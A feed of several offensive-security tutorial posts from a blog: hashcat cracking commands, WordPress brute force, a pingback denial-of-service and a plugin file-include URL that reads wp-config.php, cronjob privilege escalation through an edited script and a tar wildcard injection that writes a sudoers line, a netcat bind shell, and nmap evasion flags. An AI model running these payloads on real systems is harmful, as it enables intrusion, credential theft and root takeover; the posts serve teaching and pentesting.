2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
EXTRACT HASH
SELECT SL.name,SL.password_hash FROM sys.sql_logins AS SL;
BRUTE FORCE ATTACK
hashcat -m 1731 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 1731 -a 0 hash.txt dict.txt

WORDLIST + RULE ATTACK
hashcat -m 1731 -a 0 hash.txt dict.txt -r rule.txt

ORACLE 11G

HASH FORMAT
ac5fle62d21fd0529428b84d42e8955b04966703:38445748184477378130
EXTRACT HASH
SELECT SL.name,SL.password_hash FROM sys.sql_logins AS SL;
BRUTE FORCE ATTACK
hashcat -m 112 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 112 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 112 -a 0 hash.txt dict.txt -r rule.txt

CISCO TYPE 4 (SHA256)

HASH FORMAT
2btjjy78REtmYkkW0csHUbDZOstRXoWdX1mGrmmfeHI
BRUTE FORCE ATTACK
hashcat -m 5700 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 5700 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 5700 -a 0 hash.txt dict.txt -r rule.txt

CISCO TYPE 5 (MD5)

HASH FORMAT
$l$28772684$iEwN0gGugq09.bIz5sk8k/
BRUTE FORCE ATTACK
hashcat -m 500 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 500 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 500 -a 0 hash.txt dict.txt -r rule.txt

CISCO TYPE 9 (SCRYPT)

HASH FORMAT
$9$2MJBozw/9R3UsU$21FhcKvpghcyw8deP25G0fyZaagyU0GBymkryv0dfo6
BRUTE FORCE ATTACK
hashcat -m 9300 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 9300 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 9300 -a 0 hash.txt dict.txt -r rule.txt

WPA PSK / WPA2 PSK

HASH FORMAT
*Capture 4-way authentication handshake > capture.cap
cap2hccapx.bin capture.cap capture_out.hccapx
BRUTE FORCE ATTACK
hashcat -m 2500 -a 3 capture_out.hccapx ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 2500 -a 3 capture_out.hccapx dict.txt
WORDLIST + RULE ATTACK
hashcat -a 0 capture_out.hccapx dict.txt -r rule.txt

ONLINE RESOURCES

HASHCAT
https://hashcat.net/wiki/
https://hashcat.net/wiki/doku.php?id=hashcat_utilshttps://hashcat.net/wiki/doku.php?id=statsprocessor
http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has
http://www.netmux.com/blog/cracking-12-character-above-passwords

CRACKING RIGS
http://www.netmux.com/blog/how-to-build-a-password-cracking-rig
https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III

EXAMPLE HASH GENERATION
https://www.onlinehashcrack.com/hash-generator.php
https://www.tobtu.com/tools.php
http://hash.online-convert.com/
https://www.tools4noobs.com/online_tools/hash/
https://quickhash.com/
http://bitcoinvalued.com/tools.php
http://www.sha1-online.com/
http://www.freeformatter.com/hmac-generator.html
http://openwall.info/wiki/john/Generating-test-hashes

OTHER
http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-
passwords/
http://www.utf8-chartable.de/
http://thesprawl.org/projects/pack/
https://blog.gotmilk.com/2011/06/dictionaries-wordlists/
http://wpengine.com/unmasked/

NETMUX
http://www.netmux.com/
http://www.hashcrack.io/
https://github.com/netmux
https://twitter.com/netmux
https://www.instagram.com/netmux/

If you’re reading this last line a huge thank’s and i’m gonna cover John the ripper to the nest blog it will contain all the screen shots of the all cracking methodology with commands and everything which left in hashcat.hope you learn something new,Thank you.

The post Password Cracking with Hashcat appeared first on Armour Infosec.

Before starting with this blog firstly visit wordpress enumeration blog .

Researchers discovered an ongoing malvertising (online advertising to spread malware.)campaign targeting millions of WordPress websites to infect with backdoor and exploiting the various WordPress plugins vulnerabilities.According to WordPress, there are nearly 60 million Websites power by WordPress content management system and hundreds of WordPress Plugins are installed that developers by various developers around the globe. Cyber criminals launch the payload by exploiting the vulnerabilities that reside in some of the most popular WordPress plugins and injecting malicious scripts in unpatched WordPress website.

Attacker: Kali Linux
Target: WordPress

Table Of Content

1.Brute-forcing wp-login.php form
2.Brute Force Login via xmlrpc.php
3.Denial of Service (DOS) via xmlrpc.php
4.Exploit WordPress Plugin
5.Exploit WordPress Theme Example
6.Sniff and Capture Credentials over non-secure login
7.Compromise Systems Administration Tools
8.Content Discovery
9.Vulnerable Server Software

1.Brute Force wp-login.php Form

The most common attack against the WordPress user is brute forcing the password of an account to gain access to the back-end of the WordPress system. Other ways a password can be compromised include sniffing the password in clear text over a HTTP login session or even getting the credentials from a key logger on the workstation of the WordPress administrator.Accounts with administrator level access are the most sought after due to the amount of mischief an admin user can get up to; adding PHP command shells or malicious javascript directly through admin interface are common examples.

With the usernames we collected during information gathering we can get started (or just try admin). Take a look at the login form /wp-login.php, notice how failed logins confirm the username when an incorrect password is entered. This is very helpful to an attacker…. it also makes things more user friendly for the end user who has forgotten their username and password. This “feature” has been debated and it has been decided to keep this response within the WordPress code.
Brute forcing accounts of users is possible using a number of open source tools. In addition there are worm like scripts available that have spread through the WordPress ecosystem, searching for and spreading to WordPress sites with weak admin passwords.

WPScan

The previously mentioned WPScan tool in addition to enumeration, can also perform brute force login attacks.

wpscan --url example.com --wordlist /usr/share/wordlist/rockyou.txt --username testuser --threads 20

Nmap NSE Script

Nmap the port scanner can do much more than find open ports. Recent versions of Nmap come bundled with NSE scripts that can be used to test many different vulnerabilities; including enumerating users and brute forcing WordPress passwords.

nmap -sV --script http-wordpress-enum --script-args limit=25 example.com

PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-wordpress-enum:
| Username found: admin
| Username found: testadmin
| Username found: fred
| Username found: alice
| Username found: bob
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-enum.limit'

Burp Suite

For those familiar with web application security testing, the Burp Suite Intruder tool can also be used for brute-forcing WordPress passwords. A WordPress login attempt is only a HTTP POST request after all.Configure Burp Intruder to send a valid username (or a list of usernames) along with a list of possible passwords and wait for the successful login.

2.Brute Force Login using xmlrpc.php

The xmlrpc.php capability is an API endpoint that allows mobile apps and other programmable access to backend functions of the WordPress site such as publishing posts. It is enabled by default and several attacks are possible against the endpoint depending on permissions and the version of the target WordPress installation.
By using the xmlrpc.php endpoint to attack WordPress accounts we may bypass security plugins that are protecting the login form from abuse. This password guessing attack may also be faster, with the result being you can attempt more passwords.

Notice the -d, in curl this is the data that is sent as part of the POST request. You could also use Burp or your favorite scripting language for this request.

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://examplewp.com/xmlrpc.php

In the response we will see an invalid password response or success. It is easy to spot and work into your script.

3.Denial of Service (DOS) via xmlrpc.php

Another use of the xmlrpc.php endpoint is to perform a denial of service attack. If this capability is enabled, we can send a small request to the server and get it to respond with a full page of content to a target of our choosing. The idea is to make multiple requests from different systems and get them all to target a single host. Potentially knocking it offline due to network congestion.

First, we enumerate the capabilities of the xmlrpc.php endpoint.

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" http://examplewp.com/xmlrpc.php
The response will be a list of available methods.
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
**** truncated ****

Note the pingback.ping indicating pingback is enabled. Use the following data for the pingback attempt.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>
</param><param><value><string>http://**blog-url-from-wp**</string>
</value></param></params>
</methodCall>

Disabling access to xmlrpc.php from your web server or using .htaccess is recommended if you are not using the API. Not only will it block any attacks, it will reduce the amount of noise in your logs from the bots attempting to hit these API endpoints.

4.Exploit WordPress Plugin

Plugins, Themes and WordPress Core all contain a large amount of PHP code from developers around the world. These developers have differing abilities and focus when it comes to writing secure software. For this reason, there are thousands of exploitable vulnerabilities available to an attacker. Updating plugins, the WordPress core, and themes must be a routine task for any WordPress administrator to ensure the known vulnerabilities are patched.Common vulnerabilities include XSS, SQL injection, file upload, and code execution. All of these can have devastating consequences to a WordPress site. Search through Metasploit and exploit-db.com for exploitable WordPress bugs.

Revslider Example Exploit

An example of a WordPress plugin exploit is from a vulnerability discovered 5 years ago. The vulnerable revslider plugin resulted in tens of thousands of compromised WordPress sites. To this day, there are attempts to exploit it in our web server logs even in 2019. One reason it was such a popular plugin is that it was bundled with many themes.

A number of exploitation opportunities are possible, but this is perhaps the easiest to demonstrate. Exploitation is as difficult as loading this URL in a browser.

https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

The HTTP request would download the wp-config.php file from the vulnerable site if it had the exploitable version of revslider installed. The exploit type is known as a local file include, as the attacker is tricking the application code into including a sensitive file in the output. The wp-config.php is not normally accessible and contains the database credentials for the WordPress database user.

With the database password, an attacker could attempt to login as the WordPress admin using the same password (if passwords were re-used). A more common attack vector would be to login to the phpmyadmin script, if installed, as this uses the database credentials. If MySQL is exposed, it may even possible to directly connect to the database using a MySQL database client and the leaked credentials.

Access to the database provides the attacker options to reset the administrator password, attempt to crack the admin hash, modify content in the database adding malicious js or iframes. There are many possibilities for further exploitation once the credentials in wp-config.php are leaked.

5.Exploit WordPress Theme Example

Exploits are available from various places and forums. This example uses an exploit from the popular Metasploit Exploitation Framework. The vulnerable theme is the very popular optimize press. The vulnerability was released back in 2013 and versions after 1.45 are not vulnerable to this exploit.Numerous bots and automated attack scripts that exploit WordPress sites do not perform the enumeration phase, they simply propel exploits at thousands of sites and hope for a successful payload.Plugins and themes not enabled can be exploited. Scanning for default locations of those vulnerable files is a highly common attack by automated bots.

6.Sniff and Capture Credentials over non-secure login

Without additional security measures in place (TLS/SSL), accessing the /wp-admin/ dashboard is over an unencrypted connection. This means if you log in to your WordPress site on an unsecured network, such as the wireless at your local coffee shop or airport, your login and password to manage the site could be captured by an attacker watching your session.

In this example Wireshark capture we can clearly see the username and password being captured in our POST request to wp-login.php.

7.Compromise Systems Administration Tools

A successful password guessing attack against a server management account will give an attacker full access to the server and the WordPress application.Services that can be attacked with brute force password guessing include:

>SSH Service
>MySQL database service
>Webmin Server Management
>CPanel or WHCMS Web Hosting Control Panels
>phpMyAdmin database management application

Reduce the chance of management account compromise:

>Use strong passwords everywhere, do not re-use them!
>Move SSH to a different port
>Use TLS/SSL for web based management services to prevent sniffing and credential compromise
>White list IP addresses that are able to connect to Internet facing services

8.Content Discovery

Content Discovery is the process of attempting to find items of interest in a web path. It applies to any web application, but since we are attacking WordPress, target it towards typical files and paths of interest in a WordPress installation.

For example:

curl https://example.com/wp-config.php.bak
curl https://example.com/.wp-config.php.swp

These two examples are using curl to find a possible backup file of the wp-config.php file that we discussed earlier, as it contains sensitive information including database credentials. The second attempt tries to download the backup file that vim automatically creates when it is editing a file. A good reason not to edit files directly on your production sites!

Using curl to perform this search task for hundreds or even thousands of common files could be accomplished with a little bit of scripting. On the other hand, more appropriate tools such as Burp Suite, or gobuster, a tool that is very fast due to its parallel processing, will do a much better job.

9.Vulnerable Server Software

Testing the WordPress application itself is only one part of ensuring your web site is secure. The server that hosts the website must also be kept secure.Exploitable security vulnerabilities can, of course, be present in server software or the operating system. Examples can be found on any vulnerability mailing list. Recently a remote code execution vulnerability was found in Exim one of the most popular mail delivery servers on the Internet. PHPMyAdmin is a popular application to attack, due to its popularity and a long list of vulnerabilities.
Server Software Misconfiguration

Even if no exploitable vulnerability is present, a simple misconfiguration can leave a service vulnerable. Often security vulnerabilities are introduced simply through a misconfiguration by an overworked system administrator.

The post How to Hack WordPress ? appeared first on Armour Infosec.

“What is Cronjob ?”

Cron is a utility that allows Linux users to do specific task on the server at a given time and date.Consider system admin is required to take the backup of server at regular interval. It means system admin has to do repeated task at certain interval.This repeated task at certain interval can be automated in Linux using cron utility. This automated repeated task is known as cronjob and a table or file that maintain this cronjob is known as crontab. Linux maintains separate crontab for each and every user.Given below is the syntax to define a cronjob in crontab.

A single line in the crontab represent a cronjob. Cronjob is divided into three parts. All three parts are described below.

When to perform cronjob ?

First five numeric value represents the time of execution of the cronjob. Now let’s understand the five numeric value.

• Minute  –  First value represents minute ranges between 0 to 59 and * means any minute.
• Hour      – Second value represent Hour ranges between 0 to 24 and * means any hour.
• Day of month  – Third value represents day of month ranges between 1 to 31 and * means any day.
• Month  – Fourth value represents month ranges between 1 to 12 and * means any month.
• Day of week  – Fifth value represents the day of week ranges between 0 to 6 starting from Sunday and * means any day of week.

By whom privileges does the task perform ?

The value Just after the numeric value represents the user whose privileges will be used to accomplish the task.

Which command to be execute ?

After defining the user we need to provide the command to be executed at that time.
I hope we found our answer and now we will learn to escalate privileges through cronjob. For better understanding i am dividing further blog into two parts Enumeration and Exploitation.

Cronjob Enumeration

Lets start with the enumeration of the cronjob. The cronjob enumeration includes, finding and understanding the task that cronjob was assinged.There are following types of cronjob that we have to find.

User based Cronjob

In Linux each and every user can perform cronjobs. Each and every user maintains a crontab for their cronjobs. The location of the crontab of each user is in the following directory.

/var/spool/cron/crontabs/'crontab_of_the_each_user_named_as_their_username'

The above directory is only accessible through root user. Normal user can check their cronjobs using command.

crontab -l

Application based Cronjob

Certain application in Linux uses cronjob to perform their task. All the cronjobs that are created by any application is placed in the following directory.

/etc/cron.d

Anacron

Anacron is defined as the cron with ability to performed the task that are skipped due to some reasons.This type of cronjob are placed in the following directory.

/etc/anacrontab

Above three are the possible ways to find the cronjobs. Now for understanding them only thing you have to do is read them.

Pro tip : If you want to know about the cronjobs of the other user then you can use the tool pspy(pspy32 for 32 bit and pspy64 for 64bit).

Download link : https://github.com/DominicBreuker/pspy

Cronjob Exploitation

From the above phase you found a cronjob and understands the working of the same.Now there are two possible ways to exploit the cronjob. There may be more!!!

For following demonstration I am using CentOS as target of evaluation and Kali Linux as attacker system.

File Overwrite

Situation where the vulnerability arises :

When a user defines a cronjob that runs a script, that script is writable by attacker then attacker can go for the file overwrite. Now consider a situation where sysadmin defines a cronjob that clears all files in /tmp/demo directory every 2 min. We will setup lab for the same situation and will exploit it.

Setting up the lab with same vulnerability :

I had created a demo directory in tmp and placed some files in it (demo).

pwd
touch 1.txt 2.txt 3.txt 4.php
ls

Now lets create a python script to delete all files from demo and setting permissions to the file.

cat cleanup.py
chmod 777 cleanup.py

Next thing we need to do is setup cronjob.

cat /etc/crontab

Now lets verify our cronjob.

ls
date
ls

Exploiting the vulnerability :

We successfully created a cronjob and verified it now lets exploit it. On enumerating the target we see that there is a cronjob running on the system which running the script.

Script is world writable file (777 permission) and we can edit it. There are many way from here to escalate privileges. We are going to set suid bit on /bin/bash by replacing “rm -r /tmp/demo” from  “chmod u+s /bin/bash”.

cat cleanup.py

After waiting two minute we will run /bin/bash to escalate privilege.

whoami
/bin/bash -p
whoami

Wildcard Injection :

Situation where the vulnerability arises :

When the command is  assigned to a cronjob, contains a wildcard operator then attacker can go for wildcard injection to escalate privilege. Now consider a situation where sysadmin sets up a cronjob that creates a tar file, of all the content of user and store them in /var/backup.

Setting up the lab with same vulnerability:

Lets create some file in /home/armour/ data directory which we will backup.

touch 1.txt 2.txtx 4.txt 5.php
ls

Now we schedule a cronjob to store the backup into /var/backup

cat /etc/crontab

Lets verify out objective.

ls
date

Exploiting the vulnerability :

We successfully created our working environment, now we will exploit the vulnerability following is the check. Checking cronjob on target gives us following result.

Now lets get back to /home/armour/data directory and we will create some files.

echo 'echo "armour ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

When cronjob will run then it will provide sudo right to user:armour.

whoami
sudo bash -l

The post Linux Privilege Escalation by Exploiting Cronjobs appeared first on Armour Infosec.

These 10 enumeration techniques are a very fast way to identify users of a WordPress installation. With valid usernames effective brute force attacks can be attempted to guess the password of the user accounts.

Introduction to WordPress Security

There are many common attack vectors that hackers use to attack a WordPress website. In this article we expose many of the common avenues for attack. By revealing these, you can help build your website’s defenses against WordPress attacks.

There are some great guides available on securing a WordPress installation, this article is not intended to repeat those. To get started with securing a WordPress installation, try the excellent guide on wordpress.org or the comprehensive guide on the OWASP site.

It is noteworthy that in a managed WordPress hosting service, some of the attacks (and mitigation) listed below will be the responsibility of the hosting provider. If you are self hosting then security and maintenance is your responsibility. Ready to start? Grab our hoodie and start hacking!

In this article we are going to discuss several ways to identify the valid usernames of any WordPress website.

Table Of Contents:

1.Usernames enumerating through the Author Archives

2.WordPress Enumeration via JSON API

3.WordPress Enumeration via the Login Form

4.Enumerating WordPress Core Version

5.WordPress Plugin (and version) Enumeration

6. WordPress Theme Enumeration

7.Directory Indexing

8.Server Vulnerability Testing

9.WP Scan

10.Nmap NSE Scripts for WordPress

1.Enumerate Usernames Through the Author Archives :

In many WordPress installations, it is possible to enumerate WordPress usernames through the author archives, including the admin username. To access the author archives, we just need to add author=n (where n equals any integer) as a parameter to the WordPress home page, as shown below:

http://example.com/?author=1

The request will be automatically redirected by WordPress to its counterparts:

http://example.com/author/admin/

Using this method, we will be able to identify all the usernames by fuzzing the author parameter.

2.WordPress Enumeration via JSON API :

Using a json endpoint, it may be possible to get a list of users on the site. This was restricted in version 4.7.1 that shows only the user that has published a post and the user that has been configured. Prior to this version, all the users were shown by default.

https://wordpressexample.com/wp-json/wp/v2/users

User Enumeration via the JSON user Endpoint

3.WordPress Enumeration via the Login Form :

You must confirm valid users with the login form. Brute forcing the user name is possible using the login form as the response is different for a valid as opposed to an invalid account. Using a tool such as Burp Intruder in Burp Suite, we would load a list of possible usernames and cycle through HTTP POST requests to the WordPress login form, examining the response in each case.

A HTTP response that matches “invalid password” indicates that the username is valid. We could then move on to attacking the password using the same process with a common password list.

4.Enumerating WordPress Core Version :

Three simple methods can be used to determine the core version of WordPress.

4.1 Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This example is taken from the source of a default WP install of the version 3.5.2 and of twenty twelve theme. From the source HTML:

<meta name="generator" content="WordPress 3.5.2" />

4.2 Version in readme.html

If the meta tag has been disabled, check for the presence of /readme.html from root of the install. Early versions of WordPress had the version right there at the top of the Read Me file. But the newer versions of WordPress have removed the version from the ReadMe file.

Version in HTML source of site.

In the HTML source, the version is often appended as a parameter on links to javascript and css resources that the page is loading. Depending on the plugin, this will not always be the case and sites that have minified js and css may not have all this information leaks present.

4.3 Security Vulnerabilities in WordPress Core

If an attacker finds a site with an older WordPress Core version, this may be directly exploitable via a security vulnerability in the WordPress core, In addition, it is a clear indication that the site is not well maintained. In a poorly managed site, other components (plugins / themes) may not have been updated; in this case, the chance of a successful attack has increased considerably.

5.WordPress Plugin (and version) Enumeration :

During WordPress Plugin Enumeration, we attempt to find as many installed plugins as we can (even those that are disabled). The knowledge of the installed WordPress plugins may allow us to identify the version and research whether it is vulnerable to known exploits.

Passive analysis: It can be used to find plugins through regular HTTP requests to the WordPress site.
Active enumeration: It is more aggressive and usually involves using a script or tool to perform hundreds or even thousands of mostly invalid HTTP requests.

Reading through the HTML source of the WordPress site can reveal installed plugins through javascript links, comments and resources, such as CSS that are loaded into the page. These are the easiest plugins to discover and require no aggressive testing of the target site. Even the HTTP headers can reveal information such as the X-Powered-By header that reveals the presence of the W3-Total-Cache plugin. Some plugins do not leave traces in the HTML source; to find all the installed plugins you have to be more aggressive. A number of tools can brute force known plugin lists from the path /wp-content/plugins/ * plugin to test * /. The web server response will usually reveal valid directories (often with HTTP 403) as opposed to unknown directories on the web server with its HTTP response code.

Once you have a list of plugins that are present on the site, your WordPress scanner or manual requests can be used to determine the version of the plugin. In the readme.txt, we can see the version of the plugin. Compare this against known exploits and we can get a good idea if the site is vulnerable without actually throwing the exploit.

6. WordPress Theme Enumeration :

WordPress themes can contain vulnerabilities that might expose the site to compromise. Themes are collections of PHP code with HTML and CSS resources. More complex themes have more included components and are more likely to introduce security vulnerabilities. The enumeration of the theme is similar to the detection of plugins. The theme path is often visible in the HTML of the page source. The CSS file getting loaded from the theme will often reveal the path. With the path we have the theme name, and we can load the readme.txt to confirm the theme in use and its version.

curl http://examplewp.com/wp-content/themes/Avada/readme.txt

An important consideration when testing for vulnerable WordPress Themes (and plugins) is that a theme that is installed yet not active may still have code that is accessible and vulnerable. This is why brute force testing for theme paths is an important step when assessing an unknown WordPress installation.

7.Directory Indexing :

Directory indexing enabled on plugins directory. Directory indexing is a function of the web server that allows you to view the contents of a directory in the web accessible path. Viewing the contents of a directory allows an attacker to gather valuable information about the installation such as installed plugins and themes without the need to brute force the paths.

To check for directory indexing, you can browse to folder locations and see if you get a response that includes “Index Of” and a list of folders / files. Common locations to check would be:

/wp-content/
/wp-content/plugins/
/wp-content/themes/
/uploads/
/images/

8.Server Vulnerability Testing :

In this phase, we move into testing network services rather than direct testing of the WordPress installation. Port scanning is the standard technique for the discovery of network services running on the server.

Services that might be present on a WordPress host:

MySQL Server Remotely Accessible (port 3306)
CPANEL administration login portal (port 2082 / 2083)
Webmin administration (port 10000)
FTP service for file system access
SSH for remote control
Other web services with admin or other sites (port 8080 / 8888 etc)

Any of the above services may allow access to or control of the server through either a security vulnerability or a compromised password. Port scanning can be conducted using the excellent Nmap Port Scanner or an alternative security tool. Carrying on from our enumeration of network services using the port scanner, we could run vulnerability scans against the discovered services to identify exploitable services or other items of interest.

8.1 Nikto Vulnerability Scanner

Nikto is another vulnerability scanner that focuses on the discovery of known vulnerable scripts, configuration mistakes and other web server items of interest. The Nikto tool has been around for many years yet still finds a place in the penetration testers toolbox. Tools such as this throw tens of thousands of tests against the target in an attempt to discover known vulnerabilities and other low hanging fruits. It is a noisy process filling the target system logs with 404’s and other errors. Not recommended if you are going after a target ninja style (pentest / red team).

9.WPScan :

WPScan is a popular WordPress security testing tool that ties many of these simple enumeration techniques together, enabling users to quickly enumerate a WordPress installation. It has a commercial license that restricts the use for personal testing of WordPress sites and non-commercial usage.It attempts to identify users, plugins, and themes, depending on the selected command line options, and also show vulnerabilities for each of the discovered plugins.

https://github.com/wpscanteam/wpscan

10.Nmap NSE Scripts for WordPress :

Nmap comes bundled with NSE scripts that extend the functionality of this popular port scanner. A few of the Nmap NSE scripts are particularly helpful for enumerating WordPress users, plugins, and themes using the same techniques we have previously discussed. The best thing about this option is that if you have Nmap installed, you already have these scripts ready to go.

┌─[root@Dasagreeva]─[/usr/share/nmap/scripts]
└──╼ #ls -lha |grep wordpress
-rw-r--r-- 1 root root 5.0K Nov 26 14:51 http-wordpress-brute.nse
-rw-r--r-- 1 root root 11K Nov 26 14:51 http-wordpress-enum.nse
-rw-r--r-- 1 root root 4.6K Nov 26 14:51 http-wordpress-users.nse

The post WordPress Enumeration appeared first on Armour Infosec.

Features :

• Outbound and Inbound connections, TCP or UDP, to or from any ports.
• Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
• Built-in port-scanning capabilities, with randomization
• Advanced usage options, such as buffered send-mode (one line every N seconds), and hex dump (to stderr or to a specified file) of transmitted and received data.
• Can read command line arguments from standard input
• Optional ability to let another program service establish connections
• To read a banner from the port
• Encrypted file transfer
• Command Line Chat Server

General Syntax :

nc [options] host port

Getting start with Netcat :

Netcat can be used from any directory. Let’s start with the basic option which will show us the help page by the following command.

nc -h

Port Scanning :

One of the most common uses for netcat is as a Port Scanner. It can be used to know which ports are open and running services on a target machine. It can scan a single or multiple or a range of open ports.
We will use -z option to perform only scan and -v option enables verbose mode options for a port scan like below.

nc -v -z 192.168.1.200 80

nc -v -z 192.168.1.200 21-25

Banner Grabbing :

Netcat can be also used for grabbing service banner viz. Service Version, Status etc. To grab the target port banner from netcat, use the following command :

nc -v 192.168.1.200 22

Connecting to a Server :

Here, we will connect a FTP Server with the IP Address 192.168.1.200. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.

nc 192.168.1.200 21

Command Line Chat Server :

Netcat can also be used to communication between two users. We need to establish a connection before chatting. For this we will need need two devices. One will play the role of initiator and other will be a listener to start the conversation. Once the connection is established, communication can be done from both ends.

User 1
OS: Kali Linux
IP Address: 192.168.1.100
Role: Listener

User 2
OS: CentOS
IP Address: 192.168.1.200
Role: Initiator

On User 1, we will start a listener on port 4455 using options -l for listen, -v verbose mode, -p for port

nc -lvp 4455

On User 2, we will create an initiator by providing IP address of listener followed by the listener port.

nc -v 192.168.1.100 4455

Transferring Files with Netcat :

Netcat can also be used to transfer files, both text and binary, from one computer to
another. Here we will create a scenario where we will transfer a file from a Kali system to Windows system.

On the Windows system, we will set up a netcat listener on port 4455 and redirect any
incoming input into a file called output.txt.

nc.exe -nlvp 4455 > output.txt

On the Linux system, we will push the file to the Windows system through port 4455:

nc -v 192.168.1.200 4455  < demo.txt

The connection which will be received by netcat on the Windows system as shown below:

Randomize Port :

If we can’t decide our very own port to establish a Netcat connection. Then we can use a special -r parameter which gives us randomize local port.

nc -lv -r

Simple Web Server with Netcat :

Netcat can be used as a simple web server. Actually, web servers are very simple if there are no special configuration requirements. Web servers only send HTML pages over HTTP protocol.

while : ; do ( echo -ne "HTTP/1.1 200 OK\r\n" ; cat index.html; ) | nc -l -p 8080 ; done

Remote Administration with Netcat :

One of the most useful features of netcat is its ability to do command redirection. Netcat can take an executable file and redirect the input, output, and error messages to a TCP/UDP port rather than the default console.
To further explain this, consider the cmd.exe executable. By redirecting the stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this
computer. To further drive this home, consider the following scenario, involving Windwos and Kali.

First, we will start a listener on Windows system for remote connection which will take place from Kali.

nc.exe -nlvp 4455 -e cmd.exe

On Kali when we will hit the listener port of Windows, we will get its Command Shell.

nc -v 192.168.1.200 4455

The post Hacking with Netcat : A Comprehensive Guide appeared first on Armour Infosec.

Keep in mind that this cheat sheet merely touches the surface of the available options. The Nmap Documentation portal is your reference for digging deeper into the options available.

Nmap in a nutshell

• Target Specification
• Host Discovery
• Port Specification
• Service Discovery / Version Detection
• Operating System Version Detection
• Firewall / IDS Evasion and Spoofing
• Time and Performance based Scan
• Output of Scan
• Vulnerability / Exploit Detection, using Nmap Scripts (NSE)

Target Specification

Scan a single IP

nmap 192.168.1.1

Scan specific IPs

nmap 192.168.1.1 192.168.1.5

Scan a Range

nmap 192.168.1.1-254

Scan a Domain / Host

nmap nmap scanme.nmap.org

Scan Targets from a File

namp -iL targets.txt

Exclude the Listed Host from the Target Range

nmap --exclude 192.168.1.5 192.168.1.1-10

Host Discovery

To List given targets only, no Scan

nmap -sL 192.168.1.1-3

To Disable Port Scanning, Host Discovery only

nmap -sn 192.168.1.1/24

To Disable Host Discovery. Port scan only

nmap -Pn 192.168.1.1-5

TCP SYN discovery on given port

nmap -PS 80,21 192.168.1.1

TCP ACK discovery on given port

nmap -PA 80,21 192.168.1.1

UDP discovery on given port

nmap -PU 53 192.168.1.1

Port Specification

Scan a given Port (i.e 21 here)

nmap -p 21 192.168.1.1

Scan the given Port Range

nmap -p 21-100 192.168.1.1

Scan the multiple TCP and UDP ports

nmap -p U:53,T:21-25,80 192.168.1.1

Scan all 65535 ports

nmap -p- 192.168.1.1

Scans the given Service Name

nmap -p http,https 192.168.1.1

Scans the Top 100 ports

nmap -F 192.168.1.1

Service Discovery / Version Detection

Detect Version of the Running Services

nmap -sV 192.168.1.1

To set intensity range between 0 to 9. Higher number increases possibility of correctness

nmap -sV --version-intensity 5 192.168.1.1

To enable the light mode(intensity =2). It is faster but have less possibility of correctness

nmap  -sV --version-light 192.168.1.1

To enables the intense mode(intensity =9). It is slower but have more possibility of correctness

nmap -sV --version-all 192.168.1.1

Operating System Version Detection

Detect the Operating system

nmap -sV 192.168.1.1

Aggressive mode i.e OS, Service Version, Trace route.

nmap -A 192.168.1.1

Firewall / IDS Evasion and Spoofing

Use tiny fragmented IP packets. Its harder for packet filters

nmap -f 192.168.1.1

Used to set our own offset size

nmap --mtu 32 192.168.1.1

Use the Spoofed IP to scan

nmap -D decoy-ip1,decoy-ip2, your-own-ip remote-host-ip

Scans target.com from example.com (Domain Name Spoofing)

nmap -S example.com target.com

Uses the given port as a source

nmap -g 53 192.168.1.1

Appends random data to sent packets

nmap --data-length 200 192.168.1.1

Time and Performance based Scan

Slow scan

nmap -T0 192.168.1.1

Sneaky scan

nmap -T1 192.168.1.1

Timely scan

nmap -T2 192.168.1.1

Default scan

nmap -T3 192.168.1.1

Aggressive scan

nmap -T4 192.168.1.1

Very Aggressive scan

nmap -T5 192.168.1.1

Output of Scan

To scan in the Verbose mode (-vv for greater effect)

nmap -v 192.168.1.1

Save the scan results to the scan.file

nmap 192.168.1.1 -oN scan.file

Save the results in xml.file

nmap 192.168.1.1 -oX xml.file

Save the results in grep.file

nmap 192.168.1.1 -oG grep.file

Saves the Output in the three major formats at once

nmap 192.168.1.1 -oA result

To scan in the debug mode (-dd for greater effect)

nmap 192.168.1.1 -d

To see all the packets sent and received

nmap 192.168.1.1 -T4 --packet-trace

Vulnerability / Exploit Detection, using Nmap Scripts (NSE)

Scan with default NSE Scripts

nmap 192.168.1.1 -sC

Scan with given NSE Script ( Example: nmap.nse )

nmap 192.168.1.1 --script=nmap.nse

Use script with arguments

nmap 192.168.1.1 –script=nmap.nse --script-args user=admin

